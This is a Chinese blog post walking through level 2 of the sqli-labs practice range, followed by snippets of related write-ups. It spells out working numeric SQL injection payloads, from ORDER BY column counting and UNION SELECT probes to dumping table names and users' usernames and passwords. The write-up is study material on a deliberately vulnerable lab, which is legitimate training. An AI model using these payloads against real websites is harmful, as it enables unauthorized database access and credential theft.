sqli-labs第二关

最新推荐文章于 2024-08-08 12:13:16 发布
最新推荐文章于 2024-08-08 12:13:16 发布
阅读量224 收藏 1
点赞数
文章标签: sql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuqnqi/article/details/130519153
版权
文章详细描述了通过一系列步骤检测和利用SQL注入漏洞的过程,包括判断注入类型、字段数、回显位,以及爆破数据库名、表名和数据,主要涉及数字型注入和联合查询技术。
摘要由CSDN通过智能技术生成

跟第一关差不多,为了让加深印象,我再写一遍

第一步,判断是否存在注入点,若存在,是什么注入类型?有没有闭合?

?id=1'

页面报错,说明存在注入点;

接下来判断注入类型(当URL末尾加上 --+时,页面不报错即可猜出注入类型)

?id=1 --+

?id=1' --+

?id=1" --+

?id=1') --+

?id=1") --+

多试几个,发现只有?id=1 --+时页面正常,可判断第二关的注入类型为数字型注入,无闭合

第二步,判断字段数

无闭合,所以URL后面的注释符 --+加不加都行,建议加上

?id=1 order by 3 --+

页面正常

?id=1 order by 4 --+

报错,

由此可判断字段数为3

第三步:使用联合查询判断回显位

?id=-1 union select 1,2,3 --+

根据回显的页面,可判断回显位为第2和第3位

第四步:爆破数据库名

?id=-1 union select 1,2,database() --+

 第五步,爆表名

?id=-1 union select 1, 2,(select group_concat(table_name)from information_schema.tables where table_schema='security') --+

由此查询到的表名为:emails,referers,uagents,users

第六步:爆users表中的字段名

得出users表中的字段:id,username,password

第七步:查询表中的字段名 爆数据

?id=-1 union select 1,2,(select group_concat(id,username,password)from users) --+

成功爆出数据

第二关完成啦!

宇语
关注
sqli-labs-master靶场第二详解
tangtang_888的博客
07-06 1830
1、点击进入sqli-labs-master靶场第二Less-2 2、输入?id=1' and '1'='1,回显不正常,说明此处为数字型注入 3、依次输入?id=1 order by (1,2,3,4)--+,在输入4时出现报错,说明字段数为3
Sqli-labs靶场第9详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1965
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
sqli-labs----第二
wyzhxhn的博客
11-05 383
第二
sqli-labs靶场——第二
weixin_57240513的博客
07-25 404
id=1和?id=2-1的页面一样所以是数字型。
sqli-labs-master第二:Error Based- Intiger
weixin_33781606的博客
11-12 359
接上篇博客:http://blog.51cto.com/tdcqvip/2060816 来到第二: http://127.0.0.1/sqli-labs-master/Less-2/ 访问http://127.0.0.1/sqli-labs-master/Less-2/?id=1 判断是否有注入点: and 1 = 1 返回正常 htt...
SQLI-labs-第二
weixin_54055099的博客
08-29 506
SQLI第二的思路
sqli-labs---第二
2201_75556700的博客
05-20 331
5、查users表中的字段名(在使用url的时候可能会报错,需要把where前面的url删掉再输入空格)4、查询表名(在使用url的时候可能会报错,需要把where前面的url删掉再输入空格)id=1 and 1=2 order by 3# 没有报错。id=1 and 1=2 order by 4# 报错。id=1 显示正常。id=1# 显示正常。id=1' 报错。id=1'# 报错。可以知道这里是数字型注入。1、判断是什么类型注入。
Sqli-labs靶场第11详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1484
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第12详解[Sqli-labs-less-12]
m0_73615178的博客
03-02 771
所以,payload分析输入一个username值然后使用单引号加小括号 ") 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。输入:-admin") union select 1,2--爆出当前数据库名称及当前用户名。
sqli-labs靶场练习笔记
11-09
- **第2数据库与表的探索** - **目标**:找出数据库名称、表名及列名,并提取数据。 - **实现步骤**: - 使用`information_schema`视图获取数据库名称。 - 使用`information_schema.tables`和`information_...
sqli-labs第五sql注入流程
qq_33598708的博客
03-30 5791
正常访问 http://127.0.0.1/sqli-labs-master/less-5/?id=1 判断注入类型 http://127.0.0.1/sqli-labs-master/less-5/?id=1' and 1=2 根据报错可以知道是字符注入,使用 ' 进行闭合。 通过 ' 闭合查询无返回的数据,无论是有数据返回还是无数据返回页面都不会显示相的数据。 所以这的重点是盲注。 http://127.0.0.1/sqli-labs-master/less-5/?id=
SQL注入之Sqli-labs第二
走马
11-06 683
MYSQL数据库的所有表的信息都存储在了information_schema数据库里面的tables这个表里(information_schema.tables中两列table_schema是数据库名,table_name中表名。6.一般账号与密码都会存储在users这个表里面,所以我们要去查看users这个表里面的值,为了需要准确的得出账号与密码,可以先对里面的字段进行查询(information_schema.columns表中三列table_schema是数据库名,本次注入sql-labs的第二
sqli-labs系列——第二
茶寂的博客
01-15 261
less2 and 1=1有回显,and 1=2无回显,为数值型注入 order by 4–+报错,有3行 查询数据库名 ?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ 查询列名 ?id=0 union select 1,(select group_concat(schema_name) from information_schema.schemata),(
SQLI-LABS 02.第二 【显错注入_数字型不闭合】
weixin_45284414的博客
05-15 343
不需要心单引号闭合,只需要最后-- x注释掉后边内容。中间可以构造使用AND OR 拼接语句进行探测。
sqli-labs练习(第二)——数字型
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-17 1758
1、先判断是字符型还是数字型。 172.16.11.222/sqli-labs/Less-2/?id=1 id=2-1 与 id=1的结果一样,说明是数字型。 2、确认字段位数 172.16.11.222/sqli-labs/Less-2/?id=1 order by 3 一共3位 3、确认占位信息 172.16.11.222/sqli-labs/Less-2/?id=-1 union select 1,2,3 --+ 4、找库名 http://172.16.11.222/sqli-labs/Less-
sqli-labs第2
weixin_45626840的博客
04-23 225
直接开始 1、判断注入点 2、判断类型------>有下图可知为数字型 3、判断字段数 4、测试回显列,优先联合注入 5、有回显,优先尝试联合注入 6、接下来查库,查表,查字段,固定套路
sqli-labs(2)
jimggg的博客
03-17 319
一上来一顿单引号,双引号,单括号,双括号or and测试,都不行,拿sqlmap跑一下子 唉,大意了不是,最简单的数字型注入,开整 http://192.168.1.21/sqli-labs-master/Less-2/?id=1 order by 3–+ 正常显示,列查询3,接着暴库,这题我就不上这么多图了,偷懒!!! http://192.168.1.21/sqli-labs...
sqli-labs第二详解
最新发布
weixin_73185660的博客
08-08 191
接下来就是找出数据库名称和版本了,使用database()显示数据库名称,使用version()显示数据库版本。版本大于5.0可以使用Information_schema数据库查找表名列名信息。总结:第二相比于第一,属于数字型注入,没有引号的闭合,比较简单,但是大体思路是一样的。首先让id=1,正常显示,接着尝试and 1=1和and 1=2。通过表名查找列名,这里要注意需要同时对表名和数据库名做限制。and 1=1正常,and 1=2不正常。使用union语句,找出能显示信息的地方。
sqli-labs通笔记第二
m0_66169375的博客
04-22 502
limit后面的第一个参数表示从第几+1行开始查,第二个参数表示查几条数据。11,利用sql爆出username,password列的值。id=1 and 1=1 回显正常,判断为数字型。9,利用sql爆破出user数据表内的列名。6,爆破出security数据库内的表名。7,如果上一步没有爆出数据库名,也可以。id=1 and 1=2回显错误。eg:3,2 第四行,取两行。2,判断注入类型,字符型,数值型。1,传入id=1 查看页面回显。5,爆破出数据库内的数据库名。4,查数据库名和版本号。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值